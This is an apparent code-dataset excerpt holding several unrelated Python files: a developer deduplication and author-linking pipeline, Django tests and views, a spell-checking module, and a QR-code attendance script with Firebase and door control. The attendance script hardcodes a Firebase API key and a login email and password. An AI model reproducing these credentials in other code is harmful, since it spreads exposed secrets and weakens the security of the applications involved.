dev_embeddings,\n# desc=\"Calculating pairwise similarity matrix\",\n# ):\n# this_dev_similarity_row = []\n# for other_dev_embedding in dev_embeddings:\n# # Cosine similarity\n# similarity = cos_sim(dev_embedding, other_dev_embedding)\n# this_dev_similarity_row.append(similarity.item())\n\n# pairwise_similarity_matrix.append(this_dev_similarity_row)\n\n# # Using the constructed pairwise similarity matrix\n# # Get top n most similar devs using cosine similarity\n# # for every dev (not including themselves)\n# # And finally construct the dev comparison dataframe\n# dev_comparison_rows = []\n# for i in tqdm(\n# range(len(prepped_devs_list)),\n# desc=\"Constructing dev comparison rows\",\n# ):\n# # Get top n most similar devs\n# top_n_similar_devs = sorted(\n# [\n# (j, similarity)\n# for j, similarity in enumerate(pairwise_similarity_matrix[i])\n# if i != j\n# ],\n# key=lambda x: x[1],\n# reverse=True,\n# )[:top_n_similar]\n\n# # Get the dev details\n# dev_details = prepped_devs_list[i]\n\n# # Get the top n most similar dev details\n# top_n_similar_dev_details = []\n# for j, similarity in top_n_similar_devs:\n# top_n_similar_dev_details.append(\n# {\n# \"similarity\": similarity,\n# \"details\": prepped_devs_list[j],\n# }\n# )\n\n# # Add to dev comparison rows\n# for other_dev_details in top_n_similar_dev_details:\n# dev_comparison_rows.append(\n# {\n# \"dev_1_details\": dev_details,\n# \"dev_2_details\": other_dev_details[\"details\"],\n# \"similarity\": other_dev_details[\"similarity\"],\n# }\n# )\n\n# # Convert to dataframe\n# dev_comparison_df = pd.DataFrame(dev_comparison_rows)\n\n# # Store to disk\n# output_filepath = DATA_FILES_DIR / \"developer-deduper-annotation-dataset.csv\"\n# dev_comparison_df.to_csv(output_filepath, index=False)\n\n\n@app.command()\ndef create_author_developer_linker_dataset_for_annotation( # noqa: C901\n top_n_similar: int = 3,\n model_name: str = \"multi-qa-MiniLM-L6-cos-v1\",\n debug: bool = False,\n) -> None:\n # Setup logging\n setup_logger(debug=debug)\n\n # Load the repo contributors dataset\n log.info(\"Loading developer contributions dataset...\")\n devs = load_rs_graph_repo_contributors_dataset()\n\n # Get unique devs frame\n unique_devs_df = _get_unique_devs_frame_from_dev_contributions(\n devs,\n )\n\n # Load the author contributions dataset\n log.info(\"Loading author contributions dataset...\")\n authors = load_rs_graph_author_contributions_dataset()\n\n # Create lookup for repo to authors\n repo_to_authors: dict[str, set[str]] = {}\n author_id_to_name_dict: dict[str, str] = {}\n remade_authors = []\n for _, author in authors.iterrows():\n # Get uuid4 if author has no author id\n if author.author_id is None:\n author.author_id = str(uuid4())\n\n for contribution in author.contributions:\n if contribution[\"repo\"] not in repo_to_authors:\n repo_to_authors[contribution[\"repo\"]] = set()\n\n repo_to_authors[contribution[\"repo\"]].add(author.author_id)\n\n remade_authors.append(author)\n\n # Add to name lookup\n author_id_to_name_dict[author.author_id] = author[\"name\"]\n\n # Remake authors\n authors = pd.DataFrame(remade_authors)\n\n # Construct dataframe of author details ready for processing\n log.info(\"Constructing author details dataframe...\")\n authors_ready_rows = []\n for _, author in authors.iterrows():\n repos = {contribution[\"repo\"] for contribution in author.contributions}\n\n # Get all co-authors\n all_co_authors = set()\n for repo in repos:\n # Get author ids from repo_to_authors\n co_author_ids = repo_to_authors[repo]\n\n # Get names from author_id_to_name_dict\n co_author_names = {\n author_id_to_name_dict[author_id] for author_id in co_author_ids\n }\n\n # Add to all co-authors\n all_co_authors.update(co_author_names)\n\n # Remove self from co-authors\n all_co_authors.discard(author[\"name\"])\n\n # Add new author\n authors_ready_rows.append(\n {\n \"author_id\": author.author_id,\n \"name\": author[\"name\"],\n \"repos\": tuple(repos),\n \"co_authors\": tuple(all_co_authors),\n }\n )\n\n # Make frame\n authors_ready = pd.DataFrame(authors_ready_rows)\n\n # Only include the username, name, repos, and co_contributors columns\n # in the unique devs dataframe\n unique_devs_df = unique_devs_df[\n [\"username\", \"name\", \"email\", \"repos\", \"co_contributors\"]\n ].copy()\n\n # Prep devs and authors details for embedding and then comparison\n prepped_devs_dict = _dataframe_to_joined_str_items(\n unique_devs_df,\n unique_key=\"username\",\n tqdm_desc=\"Converting dev details to strings...\",\n )\n prepped_authors_dict = _dataframe_to_joined_str_items(\n authors_ready,\n unique_key=\"author_id\",\n tqdm_desc=\"Converting author details to strings...\",\n ignore_columns=[\"author_id\"],\n )\n\n # Create embeddings for each dev\n log.info(\"Creating embeddings for each dev...\")\n model = SentenceTransformer(model_name)\n dev_embeddings = model.encode(\n list(prepped_devs_dict.values()),\n show_progress_bar=True,\n )\n dev_embeddings_dict = { # noqa: C416\n username: embedding\n for username, embedding in zip(\n prepped_devs_dict.keys(),\n dev_embeddings,\n strict=True,\n )\n }\n\n # Create embeddings for each author\n log.info(\"Creating embeddings for each author...\")\n author_embeddings = model.encode(\n list(prepped_authors_dict.values()),\n show_progress_bar=True,\n )\n author_embeddings_dict = { # noqa: C416\n author_id: embedding\n for author_id, embedding in zip(\n prepped_authors_dict.keys(),\n author_embeddings,\n strict=True,\n )\n }\n\n # For dev, get the authors with shared repos,\n # then take the top n most similar authors\n author_dev_comparison_rows = []\n for username, dev_details in tqdm(\n prepped_devs_dict.items(),\n desc=\"Constructing author-dev comparison rows\",\n ):\n # Get the dev embedding\n dev_embedding = dev_embeddings_dict[username]\n\n # Get the full dev details from the original dataframe\n full_dev_details = unique_devs_df.loc[unique_devs_df.username == username].iloc[\n 0\n ]\n\n # Get list of repos from full dev details\n repos = full_dev_details.repos\n\n # Get the authors with matching repos\n shared_authors = set()\n for repo in repos:\n if repo in repo_to_authors:\n shared_authors.update(repo_to_authors[repo])\n\n if len(shared_authors) == 0:\n continue\n\n # Get the author embeddings\n author_embeddings = [\n author_embeddings_dict[author_id] for author_id in shared_authors\n ]\n\n # Get the similarity scores\n similarity_scores = cos_sim(\n dev_embedding,\n author_embeddings,\n )[0].tolist()\n\n # Get the top n most similar authors\n top_n_similar_authors = sorted(\n (\n (author_id, similarity)\n for author_id, similarity in zip(\n shared_authors, similarity_scores, strict=True\n )\n ),\n key=lambda x: x[1],\n reverse=True,\n )[:top_n_similar]\n\n # Get the top n most similar author details\n top_n_similar_author_details = []\n for author_id, similarity in top_n_similar_authors:\n top_n_similar_author_details.append(\n {\n \"similarity\": similarity,\n \"details\": prepped_authors_dict[author_id],\n }\n )\n\n # Add to author-dev comparison rows\n for repo_related_author_details in top_n_similar_author_details:\n author_dev_comparison_rows.append(\n {\n \"dev_details\": dev_details,\n \"author_details\": repo_related_author_details[\"details\"],\n \"similarity\": repo_related_author_details[\"similarity\"],\n }\n )\n\n # Convert to dataframe\n author_dev_comparison_df = pd.DataFrame(author_dev_comparison_rows)\n\n # Store to disk\n output_filepath = DATA_FILES_DIR / \"author-dev-linker-annotation-dataset.csv\"\n author_dev_comparison_df.to_csv(output_filepath, index=False)\n\n\n@app.command()\ndef create_irr_subset_for_author_dev_linker_annotation(\n n: int = 100,\n debug: bool = False,\n) -> None:\n # Setup logging\n setup_logger(debug=debug)\n\n # Load the author-dev linker annotation dataset\n log.info(\"Loading author-dev linker annotation dataset...\")\n author_dev_linker_annotation_df = pd.read_csv(\n DATA_FILES_DIR / \"author-dev-linker-annotation-dataset.csv\",\n )\n\n # Set seed\n np.random.seed(12)\n\n # Get n random rows\n log.info(f\"Getting {n} random rows...\")\n random_rows = author_dev_linker_annotation_df.sample(n=n)\n\n # Store to disk\n output_filepath = DATA_FILES_DIR / \"author-dev-linker-annotation-dataset-irr.csv\"\n random_rows.to_csv(output_filepath, index=False)\n\n\ndef _clustered_devs_dataframe_to_storage_ready(\n clustered_unique_devs_df: pd.DataFrame,\n) -> None:\n # Prepare final dataset that is ready for linkage\n log.info(\"Preparing final dataset for linkage...\")\n processed_rows = []\n for cluster_id, group in clustered_unique_devs_df.groupby(\"cluster_id\"):\n # Get canonical username (longest username)\n canonical_username = \"\"\n for username in group.username:\n if len(username) > len(canonical_username):\n canonical_username = username\n\n # Get all usernames\n all_usernames = group.username.to_list()\n\n # Get all repos\n all_repos = set()\n for repos in group.repos:\n all_repos.update(repos)\n\n # Get all names\n all_names = {name for name in group.name if name is not None}\n\n # Get all companies\n all_companies = {company for company in group.company if company is not None}\n\n # Get all emails\n all_emails = {email for email in group.email if email is not None}\n\n # Get all locations\n all_locations = {\n location for location in group.location if location is not None\n }\n\n # Get all bios\n all_bios = {bio for bio in group.bio if bio is not None}\n\n # Get all co-contributors\n all_co_contributors = set()\n for co_contributors in group.co_contributors:\n all_co_contributors.update(co_contributors)\n\n # Add to processed rows\n processed_rows.append(\n {\n \"canonical_username\": canonical_username,\n \"usernames\": all_usernames,\n \"repos\": all_repos,\n \"names\": all_names,\n \"companies\": all_companies,\n \"emails\": all_emails,\n \"locations\": all_locations,\n \"bios\": all_bios,\n \"co_contributors\": all_co_contributors,\n \"cluster_id\": cluster_id,\n }\n )\n\n # Convert to dataframe\n processed_rows_df = pd.DataFrame(processed_rows)\n processed_rows_df.to_parquet(RS_GRAPH_DEDUPED_REPO_CONTRIBUTORS_PATH)\n log.info(\n f\"Stored deduped repo contributors to: \"\n f\"'{RS_GRAPH_DEDUPED_REPO_CONTRIBUTORS_PATH}'\"\n )\n\n\n@app.command()\ndef train_developer_deduper(debug: bool = False) -> None:\n # Setup logging\n setup_logger(debug=debug)\n\n # Load the repo contributors dataset\n log.info(\"Loading developer contributions dataset...\")\n developer_contributions = load_rs_graph_repo_contributors_dataset()\n\n # Each row should be a unique person\n log.info(\"Getting unique developers frame...\")\n unique_devs = []\n for username, group in developer_contributions.groupby(\"username\"):\n flat_co_contribs = []\n for co_contribs in group.co_contributors:\n flat_co_contribs.extend(co_contribs)\n\n unique_devs.append(\n {\n \"username\": username,\n \"repos\": tuple(group.repo),\n \"name\": group[\"name\"].iloc[0],\n \"company\": group.company.iloc[0],\n \"email\": group.email.iloc[0],\n \"location\": group.location.iloc[0],\n \"bio\": group.bio.iloc[0],\n \"co_contributors\": tuple(flat_co_contribs),\n }\n )\n\n # Reform as df\n unique_devs_df = pd.DataFrame(unique_devs)\n\n # Format as records dict\n developer_records = {i: row.to_dict() for i, row in unique_devs_df.iterrows()}\n\n # Variables for dedupe\n variables = [\n {\"field\": \"username\", \"type\": \"String\"},\n {\"field\": \"repos\", \"type\": \"Set\"},\n {\"field\": \"name\", \"type\": \"Name\", \"has missing\": True},\n {\"field\": \"company\", \"type\": \"String\", \"has missing\": True},\n {\"field\": \"email\", \"type\": \"String\", \"has missing\": True},\n {\"field\": \"location\", \"type\": \"String\", \"has missing\": True},\n {\"field\": \"bio\", \"type\": \"String\", \"has missing\": True},\n {\"field\": \"co_contributors\", \"type\": \"Set\"},\n ]\n\n # Init deduper\n log.info(\"Initializing deduper...\")\n deduper = dedupe.Dedupe(variables)\n\n # Prepare training samples\n log.info(\"Preparing training samples...\")\n deduper.prepare_training(\n developer_records,\n sample_size=int(len(developer_records) * 0.8),\n )\n\n # Start annotating\n log.info(\"Starting annotation...\")\n dedupe.console_label(deduper)\n\n # Train the model\n log.info(\"Training model...\")\n deduper.train()\n\n # Save the model training settings\n train_settings_filepath = (\n DATA_FILES_DIR / \"developer-deduper-training-settings.json\"\n )\n with open(\"train_settings_filepath\", \"w\") as f:\n deduper.write_training(f)\n log.info(\n f\"Stored developer deduper training settings to: '{train_settings_filepath}'\"\n )\n\n # Save the model clustering settings / weights\n cluster_settings_filepath = (\n DATA_FILES_DIR / \"developer-deduper-cluster-settings.pkl\"\n )\n with open(cluster_settings_filepath, \"wb\") as f:\n deduper.write_settings(f)\n log.info(\n f\"Stored developer deduper cluster settings to: '{cluster_settings_filepath}'\"\n )\n\n # Partition the records\n log.info(\"Clustering all records...\")\n clustered_records = deduper.partition(developer_records, threshold=0.5)\n cluster_membership = {}\n for cluster_id, (records, scores) in enumerate(clustered_records):\n for record_id, score in zip(records, scores, strict=True): # type: ignore\n cluster_membership[record_id] = {\n \"cluster_id\": cluster_id,\n \"confidence_score\": score,\n }\n\n # Add cluster membership to unique devs dataframe\n clustered_unique_devs = []\n for dev_id, cluster_details in cluster_membership.items():\n dev_details = developer_records[dev_id]\n dev_details[\"cluster_id\"] = cluster_details[\"cluster_id\"]\n dev_details[\"confidence\"] = cluster_details[\"confidence_score\"]\n clustered_unique_devs.append(dev_details)\n\n # Convert to dataframe\n clustered_unique_devs_df = pd.DataFrame(clustered_unique_devs)\n\n # Store clustered unique devs\n output_filepath_for_clustered_unique_devs = (\n DATA_FILES_DIR / \"rs-graph-clustered-unique-devs.parquet\"\n )\n clustered_unique_devs_df.to_parquet(output_filepath_for_clustered_unique_devs)\n log.info(\n f\"Stored clustered unique devs to: \"\n f\"'{output_filepath_for_clustered_unique_devs}'\"\n )\n\n # Log n deduped\n n_clusters = clustered_unique_devs_df.cluster_id.nunique()\n log.info(f\"Number of original 'unique devs': {len(unique_devs_df)}\")\n log.info(f\"Number of deduped 'unique devs': {n_clusters}\")\n diff = len(unique_devs_df) - n_clusters\n log.info(f\"Difference: {diff} ({diff / len(unique_devs_df) * 100:.2f}%)\")\n\n # Prepare final dataset that is ready for linkage\n _clustered_devs_dataframe_to_storage_ready(clustered_unique_devs_df)\n\n\n@app.command()\ndef train_author_developer_linker(debug: bool = False) -> None:\n # Setup logging\n setup_logger(debug=debug)\n\n # Load the repo contributors dataset\n log.info(\"Loading developer contributions dataset...\")\n devs = load_rs_graph_deduped_repo_contributors_dataset()\n\n # Load the author contributions dataset\n log.info(\"Loading author contributions dataset...\")\n authors = load_rs_graph_author_contributions_dataset()\n\n # Construct dataframe of author details ready for processing\n log.info(\"Constructing author details dataframe...\")\n authors_ready_rows = []\n for _, author in authors.iterrows():\n repos = {contribution[\"repo\"] for contribution in author.contributions}\n\n authors_ready_rows.append(\n {\n \"name\": author[\"name\"],\n \"secondary_name\": author[\"name\"], # username comparison\n \"repos\": tuple(repos),\n }\n )\n\n # Make frame\n authors_ready = pd.DataFrame(authors_ready_rows)\n\n # TODO: use None for no name and attach \"has missing\"\n\n # Construct dataframe of developer details ready for processing\n log.info(\"Constructing developer details dataframe...\")\n devs_ready_rows = []\n for _, dev in devs.iterrows():\n canonical_name = \"\"\n for name in dev.names:\n if len(name) > len(canonical_name):\n canonical_name = name\n\n # Catch no names for person\n # use username\n if len(canonical_name) == 0:\n canonical_name = dev.canonical_username\n\n devs_ready_rows.append(\n {\n \"name\": canonical_name,\n \"secondary_name\": dev.canonical_username,\n \"repos\": tuple(dev.repos),\n }\n )\n\n # Make frame\n devs_ready = pd.DataFrame(devs_ready_rows)\n\n # Convert both to records orientation\n author_records = {i: row.to_dict() for i, row in authors_ready.iterrows()}\n dev_records = {i: row.to_dict() for i, row in devs_ready.iterrows()}\n\n # Linker fields\n fields = [\n # author given name <--> github given name (or fallback github username)\n # both string diff and name diff\n {\"field\": \"name\", \"type\": \"String\"},\n {\"field\": \"name\", \"type\": \"Name\"},\n # author given name <--> github username\n {\"field\": \"secondary_name\", \"type\": \"String\"},\n # set repos authored (via JOSS / softwareX) <--> set repos contributed\n {\"field\": \"repos\", \"type\": \"Set\"},\n ]\n\n # Create linker\n linker = dedupe.RecordLink(fields)\n\n # Find which dataset had less records\n # and create sample size using 80% of dataset size\n min_dataset_size = min(len(author_records), len(dev_records))\n sample_size = int(min_dataset_size * 0.8)\n\n # Prepare training samples\n log.info(\"Preparing training samples...\")\n linker.prepare_training(author_records, dev_records, sample_size=sample_size)\n\n # Start annotating\n dedupe.console_label(linker)\n\n # Train the model\n linker.train()\n\n # Save the model training settings\n train_settings_filepath = (\n DATA_FILES_DIR / \"author-dev-linker-training-settings.json\"\n )\n with open(train_settings_filepath, \"w\") as f:\n linker.write_training(f)\n\n # Save the model clustering settings / weights\n cluster_settings_filepath = (\n DATA_FILES_DIR / \"author-dev-linker-cluster-settings.pkl\"\n )\n with open(cluster_settings_filepath, \"wb\") as f:\n linker.write_settings(f)\n\n # Join the records\n linked_records = linker.join(author_records, dev_records, threshold=0.0)\n\n # Store linked records\n linked_details_rows = []\n for (author_id, dev_id), confidence in linked_records:\n # Get matching author and dev\n author = authors.loc[author_id]\n dev = devs.loc[dev_id]\n\n # Create linked record\n linked_details_rows.append(\n {\n \"author_id\": author.author_id,\n \"name\": author[\"name\"],\n \"h_index\": author.h_index,\n \"usernames\": dev.usernames,\n \"repos\": dev.repos,\n \"confidence\": confidence,\n }\n )\n\n # Make frame\n linked_details = pd.DataFrame(linked_details_rows)\n\n # Store linked details\n linked_details.to_parquet(RS_GRAPH_LINKED_AUTHORS_DEVS_PATH)\n log.info(f\"Stored linked author-devs to: \" f\"'{RS_GRAPH_LINKED_AUTHORS_DEVS_PATH}'\")\n\n # Log n linked\n n_linked = linked_details.author_id.nunique()\n log.info(f\"Number of linked authors and devs: {n_linked}\")\n\n\n###############################################################################\n\n\ndef main() -> None:\n app()\n\n\nif __name__ == \"__main__\":\n app()\n","repo_name":"evamaxfield/rs-graph","sub_path":"rs_graph/bin/modeling.py","file_name":"modeling.py","file_ext":"py","file_size_in_byte":25868,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"24534754901","text":"from django.contrib.auth.models import Permission\n\nfrom accounts.factories import UserFactory\nfrom functional_tests import pages\nfrom functional_tests.base import FunctionalTestCase\nfrom people.factories import PersonFactory\n\n\nclass PersonCreationTestCase(FunctionalTestCase):\n def setUp(self):\n super().setUp()\n\n # user\n create_person = Permission.objects.filter(name=\"Can add person\")\n view_person = Permission.objects.filter(name=\"Can view person\")\n permissions = create_person | view_person\n self.user = UserFactory(user_permissions=tuple(permissions))\n\n # person\n self.person = PersonFactory.build()\n\n # auth\n self.create_pre_authenticated_session(self.user)\n\n def test_person_creation(self):\n # An authorized user visits the person creation page.\n person_creation_page = pages.PersonCreationPage(self)\n person_creation_page.visit()\n\n # He knows he's in the right place because he can see the name\n # of the site in the title and header\n self.assertEqual(person_creation_page.title, self.SITE_NAME)\n self.assertEqual(person_creation_page.header.title, self.header_title)\n self.assertEqual(person_creation_page.heading, \"Add a person's information\")\n\n # He sees the inputs of the person form, including labels and placeholders.\n self.assertEqual(person_creation_page.form.username_label, \"Username*\")\n self.assertEqual(person_creation_page.form.full_name_label, \"Full name*\")\n self.assertEqual(person_creation_page.form.gender_label, \"Gender*\")\n self.assertEqual(\n person_creation_page.form.date_of_birth_label, \"Date of birth*\"\n )\n self.assertEqual(person_creation_page.form.submit_button_label, \"Add\")\n\n # He enters the person's details and submits the form\n person_creation_page.form.enter_username(self.person.username)\n person_creation_page.form.enter_full_name(self.person.full_name)\n person_creation_page.form.select_gender(self.person.get_gender_display())\n person_creation_page.form.enter_dob(str(self.person.dob))\n person_creation_page.form.submit()\n\n # The person's information was added successfully and he is redirected\n # to the person's detail page\n person_detail_page = pages.PersonDetailPage(self, self.person.username)\n self.assertEqual(self.browser.current_url, person_detail_page.url)\n self.assertEqual(\n person_detail_page.messages[0],\n f\"{self.person.username}'s information has been added successfully.\",\n )\n","repo_name":"harisonmg/church-ims","sub_path":"functional_tests/features/test_person_creation.py","file_name":"test_person_creation.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"26609309732","text":"import re\nfrom collections import Counter\n\nfrom search_engine.utils import *\n\n\ndef build_dictionary(documents):\n \"\"\"\n Build dictionary of original word forms (without stemming, but tokenized, lowercased, and only apt words considered)\n :param documents: dict of documents (contents)\n :return: {'word1': freq_word1, 'word2': freq_word2, ...}\n\n \"\"\"\n result = Counter()\n\n for doc in documents:\n tokenized = tokenize(documents[doc].lower())\n for w in tokenized:\n if is_apt_word(w):\n result[w] += 1\n \n return dict(result)\n\n\ndef build_k_gram_index(dictionary, k):\n \"\"\"\n Build index of k-grams for dictionary words. Padd with '$' ($word$) before splitting to k-grams\n :param dictionary: dictionary of original words\n :param k: number of symbols in one gram\n :return: {'gram1': ['word1_with_gram1', 'word2_with_gram1', ...],\n 'gram2': ['word1_with_gram2', 'word2_with_gram2', ...], ...}\n \"\"\"\n result = {}\n\n for word in dictionary.keys():\n w = '$' + word + '$'\n if len(w) >= k:\n for i in range(0, len(w) - k + 1):\n gram = w[i: i + k]\n i += k\n if gram not in result:\n result[gram] = [word]\n else:\n result[gram].append(word)\n \n return result\n \n\ndef generate_wildcard_options(wildcard, k_gram_index):\n \"\"\"\n For a given wildcard return all words matching it using k-grams\n Refer to book chapter 3.2.2\n Don't forget to pad wildcard with '$', when appropriate\n :param wildcard: query word in a form of a wildcard\n :param k_gram_index:\n :return: list of options (matching words)\n \"\"\"\n result = []\n\n k = len(list(k_gram_index.keys())[0])\n k_grams = build_k_gram_index({wildcard: 0}, k)\n\n wildcard = wildcard.replace('*', '.*')\n setlist = []\n \n for gram in k_grams:\n if gram in k_gram_index:\n matched = set()\n for word in k_gram_index[gram]:\n mathing = re.match(wildcard, word)\n if mathing and mathing.group(0) == word:\n matched.add(word)\n \n if len(matched) > 0:\n setlist.append(matched)\n \n if len(setlist) > 0:\n result = list(set.intersection(*setlist))\n \n return result\n\n\ndef produce_soundex_code(word):\n \"\"\"\n Implement soundex algorithm, version from book chapter 3.4\n :param word: word in lowercase\n :return: soundex 4-character code, like 'k450'\n \"\"\"\n code = [word[0]]\n\n tranlation = '01230120022455012623010202'\n cur_digit = -1\n for char in word[1:]:\n digit = tranlation[ord(char) - ord('a')]\n if cur_digit == -1:\n cur_digit = digit\n\n if digit != cur_digit:\n if cur_digit != '0':\n code.append(str(cur_digit))\n cur_digit = digit\n \n if (code[-1] != cur_digit) and (cur_digit != '0') and cur_digit != -1:\n code.append(cur_digit)\n\n result = ''.join(code[:4]) + '0' * (4 - len(code))\n return result\n\n\ndef build_soundex_index(dictionary):\n \"\"\"\n Build soundex index for dictionary words.\n :param dictionary: dictionary of original words\n :return: {'code1': ['word1_with_code1', 'word2_with_code1', ...],\n 'code2': ['word1_with_code2', 'word2_with_code2', ...], ...}\n \"\"\"\n result = {}\n\n for word in dictionary:\n code = produce_soundex_code(word)\n if code not in result:\n result[code] = [word]\n else:\n result[code].append(word)\n\n return result\n","repo_name":"DrompiX/search_engine","sub_path":"search_engine/spell_checking.py","file_name":"spell_checking.py","file_ext":"py","file_size_in_byte":3645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"34163373249","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom .form import AutorForm\nfrom .models import Autor\n\ndef Home(request):\n return render(request,'index.html')\n\n\n#Creando autor\ndef create_autor(request):\n if request.method == 'GET':\n autor= AutorForm()\n return render(request,'libros/create.html',{'form':autor})\n else:\n autor= AutorForm(request.POST)#Obtengo los datos ingresados y lo guardo en la variable formu\n if autor.is_valid():\n autor.save()\n return redirect('autores')\n\ndef autores(request):\n autores=Autor.objects.all()\n return render(request,'libros/autores.html',{'form':autores}) \n\n\n\ndef editar(request, id):\n if request.method==\"GET\":\n autor=get_object_or_404(Autor,pk=id)\n form=AutorForm(instance=autor)\n return render(request,'libros/editar.html',{'form':form})\n \n else:\n autor=get_object_or_404(Autor,pk=id)\n form=AutorForm(request.POST, instance=autor)\n form.save()\n return redirect('autores')\n \n\ndef eliminar(request, id):\n autor = get_object_or_404(Autor, id=id)\n autor.delete()\n return redirect('autores')\n \n\n# Create your views here.\n","repo_name":"ByFer12/CRUD-DJANGO","sub_path":"libro/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1069812196","text":"import cv2\r\nfrom pyzbar import pyzbar\r\nimport pyrebase\r\nimport sqlite3\r\nfrom tkinter import *\r\nfrom PIL import ImageTk, Image\r\nfrom datetime import datetime\r\nimport csv\r\nimport serial as sr\r\nimport time\r\n\r\ndef getImage(id):\r\n try:\r\n img = Image.open(\"dataimage\\\\\"+id[0]+\".jpg\")\r\n return img \r\n except:\r\n print(\"No image found\")\r\n img = None\r\n return img\r\n\r\ndef get_profile(id, fullName):\r\n try:\r\n conn = sqlite3.connect('data.db')\r\n query = \"Select * from People WHERE (ID='\"+str(id)+\"' AND FullName='\"+str(fullName)+\"')\"\r\n cursor = conn.execute(query)\r\n profile = None\r\n\r\n for row in cursor:\r\n profile = row\r\n conn.close()\r\n return profile\r\n \r\n except sqlite3.OperationalError:\r\n print(\"Can't be found\")\r\n\r\ndef zoom_center(frame, zoom_factor=1.5):\r\n y_size = frame.shape[0]\r\n x_size = frame.shape[1]\r\n \r\n x1 = int(0.5*x_size*(1-1/zoom_factor))\r\n x2 = int(x_size-0.5*x_size*(1-1/zoom_factor))\r\n y1 = int(0.5*y_size*(1-1/zoom_factor))\r\n y2 = int(y_size-0.5*y_size*(1-1/zoom_factor))\r\n\r\n frame = frame[y1:y2,x1:x2]\r\n return cv2.resize(frame, None, fx=zoom_factor, fy=zoom_factor, interpolation=cv2.INTER_CUBIC)\r\n\r\ndef read_qrcode(frame, ckd, start):\r\n qrcodes = pyzbar.decode(frame, symbols=[pyzbar.ZBarSymbol.QRCODE])\r\n Id = \"\"\r\n fullName = \"\"\r\n dem = 0\r\n db = firebase.database()\r\n\r\n for qrcode in qrcodes:\r\n x, y , w, h = qrcode.rect\r\n qrcode_info = qrcode.data.decode(\"utf-8\")\r\n cv2.rectangle(frame, (x, y),(x+w, y+h), (0, 255, 0), 2)\r\n for i in qrcode_info:\r\n if dem == 0:\r\n if i == \"|\":\r\n dem+=1\r\n else:\r\n Id = Id + i\r\n elif dem == 1:\r\n if i == \"|\":\r\n dem+=1\r\n else:\r\n fullName = fullName + i\r\n elif dem == 2:\r\n break\r\n information = get_profile(Id, fullName)\r\n if information != None:\r\n if information != ckd:\r\n temp = db.child(\"informationStudent\").child(\"temp\").get().val()\r\n heart_rate = db.child(\"informationStudent\").child(\"nhip_tim\").get().val()\r\n spo2 = db.child(\"informationStudent\").child(\"spo2\").get().val()\r\n opendoor = db.child(\"informationStudent\").child(\"opendoor\").get().val()\r\n ckd = information\r\n start = time.time()\r\n if opendoor:\r\n ser.write(\"m\".encode(\"ascii\"))\r\n \r\n # cv2.putText(frame, information[0], (x + 10, y+h+30), font, 1, (255, 255, 255), 1)\r\n # cv2.putText(frame, information[1], (x + 10, y+h+60), font, 1, (255, 255, 255), 1)\r\n # cv2.putText(frame, information[2], (x + 10, y+h+90), font, 1, (255, 255, 255), 1)\r\n \r\n now = datetime.now()\r\n dt_string = now.strftime(\"%H:%M:%S\")\r\n date = now.strftime(\"%d_%m_%Y\")\r\n try:\r\n f = open(\"log\\\\\"+information[0]+\"_\"+information[1]+\"_\"+information[2]+\".csv\", \"r\", encoding = \"utf-8\")\r\n log = csv.reader(f)\r\n newLog = []\r\n for row in log:\r\n newLog.append(row)\r\n f.close()\r\n status = \"Nothing\"\r\n except:\r\n status = None\r\n\r\n if status is None:\r\n f = open(\"log\\\\\"+information[0]+\"_\"+information[1]+\"_\"+information[2]+\".csv\", \"w\", encoding = \"utf-8\", newline = \"\")\r\n create = csv.writer(f)\r\n create.writerow([(\"Date\"), (\"Time\"), (\"Temperature\"), (\"Heart rate\"), (\"SpO2\")])\r\n create.writerow((date, dt_string, temp, heart_rate, spo2))\r\n f.close()\r\n else:\r\n newLog.append((date, dt_string, temp, heart_rate, spo2))\r\n f = open(\"log\\\\\"+information[0]+\"_\"+information[1]+\"_\"+information[2]+\".csv\", \"w\", encoding = \"utf-8\", newline = \"\")\r\n save = csv.writer(f)\r\n save.writerows(newLog)\r\n \r\n window=Tk()\r\n Label(window, text=\"Chứng minh nhân dân: \"+information[0], fg=\"black\", font=\"Helvetica\").pack()\r\n Label(window, text=\"Họ và Tên: \"+information[1], fg=\"black\", font=\"Helvetica\").pack()\r\n Label(window, text=\"Mã sinh viên: \"+information[2], fg=\"black\", font=\"Helvetica\").pack()\r\n Label(window, text=\"Ngày tháng năm sinh: \"+information[3], fg=\"black\", font=\"Helvetica\").pack()\r\n Label(window, text=\"Chức vụ: \"+information[4], fg=\"black\", font=\"Helvetica\").pack()\r\n Label(window, text=\"Nhiệt độ đo được: \"+str(temp)+\"°C\", fg=\"black\", font=\"Helvetica\").pack()\r\n Label(window, text=\"Nhịp tim đo được: \"+str(heart_rate)+\" bmp\", fg=\"black\", font=\"Helvetica\").pack()\r\n Label(window, text=\"Nhịp tim đo được: \"+str(spo2)+\" %\", fg=\"black\", font=\"Helvetica\").pack()\r\n img = getImage(information)\r\n if img != None:\r\n img = img.resize((300, 350))\r\n img = ImageTk.PhotoImage(img)\r\n Label(window, image = img).pack()\r\n window.title(\"Thông tin sinh viên\")\r\n window.geometry(\"600x550+10+20\")\r\n window.after(5000, lambda:window.destroy())\r\n window.mainloop()\r\n else:\r\n db.child(\"informationStudent\").update({\"sai_nguoi\":1})\r\n\r\n return frame, ckd, start\r\n\r\nfirebaseConfig = {\r\n 'apiKey': \"AIzaSyCt60H3fUGiPv973_fMMN51lp2XXRazjF0\",\r\n 'authDomain': \"arduino-firebase-vippro.firebaseapp.com\",\r\n 'databaseURL': \"https://arduino-firebase-vippro-default-rtdb.firebaseio.com\",\r\n 'projectId': \"arduino-firebase-vippro\",\r\n 'storageBucket': \"arduino-firebase-vippro.appspot.com\",\r\n 'messagingSenderId': \"437474413862\",\r\n 'appId': \"1:437474413862:web:92d2b1c67528bf994fc5e7\",\r\n 'measurementId': \"G-HMRKLR9EVW\",\r\n 'serviceAccount': \"serviceAccountKey.json\"\r\n}\r\n\r\nfirebase = pyrebase.initialize_app(firebaseConfig)\r\nauth = firebase.auth()\r\nemail = \"toilaminh@mail.com\"\r\npassword = \"123456\"\r\nauth.sign_in_with_email_and_password(email, password)\r\nprint(\"Successfully signed in!\")\r\n\r\nckd = None\r\nser = sr.Serial('COM5', 9600)\r\ncap = 